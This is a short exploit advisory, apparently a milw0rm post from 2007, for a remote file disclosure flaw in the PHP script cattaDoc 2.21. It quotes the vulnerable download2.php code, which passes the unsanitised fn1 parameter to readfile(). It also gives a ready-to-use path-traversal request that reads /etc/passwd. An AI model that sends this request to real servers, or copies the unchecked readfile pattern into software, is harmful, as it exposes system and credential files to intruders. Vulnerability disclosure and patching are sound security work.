1 # cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability
2 # D.Script: http://cattadoc.com/download/cattadoc−2.21.tgz
3 # Discovered by: GolD_M = [Mahmood_ali]
4 # Homepage: http://www.Tryag.cc
5 # Greetz To: Tryag−Team & 4lKaSrGoLd3n−Team & AsbMay’s Group
6 # V.Code:
7 ##############################################################
8 # $tp = $_REQUEST[’mtp’]; #
9 # $ofn = ’"’.$_REQUEST[’fn2’].’"’; #
10 # header("Content−type: $tp"); #
11 # header("Content−Disposition: attachment; filename=$ofn"); #
12 # readfile($_REQUEST[’fn1’]); <<−−−− #
13 ##############################################################
14 # Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd
15
16 # milw0rm.com [2007−04−06]
Page 1/1
cattaDoc 2.21 download2.php fn1 Remote File Disclosure Vulnerability
GoLd_M
04/06/2007